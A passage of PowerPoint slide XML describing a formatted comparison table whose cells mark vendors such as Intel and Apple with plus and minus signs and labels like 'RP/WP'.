                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="lt1"/>
                        </a:buClr>
                        <a:buSzPct val="25000"/>
                        <a:buFont typeface="Roboto Condensed"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="1500" u="none" cap="none" strike="noStrike">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto Condensed"/>
                          <a:ea typeface="Roboto Condensed"/>
                          <a:cs typeface="Roboto Condensed"/>
                          <a:sym typeface="Roboto Condensed"/>
                        </a:rPr>
                        <a:t>+</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450" anchor="ctr">
                    <a:lnL cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnL>
                    <a:lnR cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnR>
                    <a:lnT cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnT>
                    <a:lnB cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="lt1"/>
                        </a:buClr>
                        <a:buSzPct val="25000"/>
                        <a:buFont typeface="Roboto Condensed"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="1000" u="none" cap="none" strike="noStrike">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto Condensed"/>
                          <a:ea typeface="Roboto Condensed"/>
                          <a:cs typeface="Roboto Condensed"/>
                          <a:sym typeface="Roboto Condensed"/>
                        </a:rPr>
                        <a:t>RP/WP</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450" anchor="ctr">
                    <a:lnL cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnL>
                    <a:lnR cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnR>
                    <a:lnT cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnT>
                    <a:lnB cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="lt1"/>
                        </a:buClr>
                        <a:buSzPct val="25000"/>
                        <a:buFont typeface="Roboto Condensed"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="1500" u="none" cap="none" strike="noStrike">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto Condensed"/>
                          <a:ea typeface="Roboto Condensed"/>
                          <a:cs typeface="Roboto Condensed"/>
                          <a:sym typeface="Roboto Condensed"/>
                        </a:rPr>
                        <a:t>+</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450" anchor="ctr">
                    <a:lnL cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnL>
                    <a:lnR cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnR>
                    <a:lnT cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnT>
                    <a:lnB cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="404925">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="lt1"/>
                        </a:buClr>
                        <a:buSzPct val="25000"/>
                        <a:buFont typeface="Roboto Condensed"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="1000" u="none" cap="none" strike="noStrike">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto Condensed"/>
                          <a:ea typeface="Roboto Condensed"/>
                          <a:cs typeface="Roboto Condensed"/>
                          <a:sym typeface="Roboto Condensed"/>
                        </a:rPr>
                        <a:t>Intel</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450" anchor="ctr">
                    <a:lnL cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnL>
                    <a:lnR cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnR>
                    <a:lnT cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnT>
                    <a:lnB cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="lt1"/>
                        </a:buClr>
                        <a:buSzPct val="25000"/>
                        <a:buFont typeface="Roboto Condensed"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="1500" u="none" cap="none" strike="noStrike">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto Condensed"/>
                          <a:ea typeface="Roboto Condensed"/>
                          <a:cs typeface="Roboto Condensed"/>
                          <a:sym typeface="Roboto Condensed"/>
                        </a:rPr>
                        <a:t>+</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450" anchor="ctr">
                    <a:lnL cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnL>
                    <a:lnR cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnR>
                    <a:lnT cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnT>
                    <a:lnB cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="lt1"/>
                        </a:buClr>
                        <a:buSzPct val="25000"/>
                        <a:buFont typeface="Roboto Condensed"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="1500" u="none" cap="none" strike="noStrike">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto Condensed"/>
                          <a:ea typeface="Roboto Condensed"/>
                          <a:cs typeface="Roboto Condensed"/>
                          <a:sym typeface="Roboto Condensed"/>
                        </a:rPr>
                        <a:t>+</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450" anchor="ctr">
                    <a:lnL cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnL>
                    <a:lnR cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnR>
                    <a:lnT cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnT>
                    <a:lnB cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:srgbClr val="E63451"/>
                        </a:buClr>
                        <a:buSzPct val="25000"/>
                        <a:buFont typeface="Arial"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="1500" u="none" cap="none" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="E63451"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>-</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450" anchor="ctr">
                    <a:lnL cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnL>
                    <a:lnR cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnR>
                    <a:lnT cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnT>
                    <a:lnB cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="lt1"/>
                        </a:buClr>
                        <a:buSzPct val="25000"/>
                        <a:buFont typeface="Roboto Condensed"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="1500" u="none" cap="none" strike="noStrike">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto Condensed"/>
                          <a:ea typeface="Roboto Condensed"/>
                          <a:cs typeface="Roboto Condensed"/>
                          <a:sym typeface="Roboto Condensed"/>
                        </a:rPr>
                        <a:t>+</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450" anchor="ctr">
                    <a:lnL cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnL>
                    <a:lnR cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnR>
                    <a:lnT cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnT>
                    <a:lnB cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="404925">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="lt1"/>
                        </a:buClr>
                        <a:buSzPct val="25000"/>
                        <a:buFont typeface="Roboto Condensed"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="1000" u="none" cap="none" strike="noStrike">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto Condensed"/>
                          <a:ea typeface="Roboto Condensed"/>
                          <a:cs typeface="Roboto Condensed"/>
                          <a:sym typeface="Roboto Condensed"/>
                        </a:rPr>
                        <a:t>Apple</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450" anchor="ctr">
                    <a:lnL cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnL>
                    <a:lnR cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnR>
                    <a:lnT cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnT>
                    <a:lnB cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:srgbClr val="E63451"/>
                        </a:buClr>
                        <a:buSzPct val="25000"/>
                        <a:buFont typeface="Roboto Condensed"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="1500" u="none" cap="none" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="E63451"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto Condensed"/>
                          <a:ea typeface="Roboto Condensed"/>
                          <a:cs typeface="Roboto Condensed"/>
                          <a:sym typeface="Roboto Condensed"/>
                        </a:rPr>
                        <a:t>-</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450" anchor="ctr">
                    <a:lnL cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnL>
                    <a:lnR cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnR>
                    <a:lnT cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnT>
                    <a:lnB cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:srgbClr val="E63451"/>
                        </a:buClr>
                        <a:buSzPct val="25000"/>
                        <a:buFont typeface="Roboto Condensed"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="1500" u="none" cap="none" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="E63451"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto Condensed"/>
                          <a:ea typeface="Roboto Condensed"/>
                          <a:cs typeface="Roboto Condensed"/>
                          <a:sym typeface="Roboto Condensed"/>
                        </a:rPr>
                        <a:t>-</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450" anchor="ctr">
                    <a:lnL cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnL>
                    <a:lnR cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnR>
                    <a:lnT cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnT>
                    <a:lnB cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="lt1"/>
                        </a:buClr>
                        <a:buSzPct val="25000"/>
                        <a:buFont typeface="Roboto Condensed"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="1000" u="none" cap="none" strike="noStrike">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto Condensed"/>
                          <a:ea typeface="Roboto Condensed"/>
                          <a:cs typeface="Roboto Condensed"/>
                          <a:sym typeface="Roboto Condensed"/>
                        </a:rPr>
                        <a:t>WP</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:srgbClr val="000000"/>
                        </a:buClr>
                        <a:buSzPct val="25000"/>
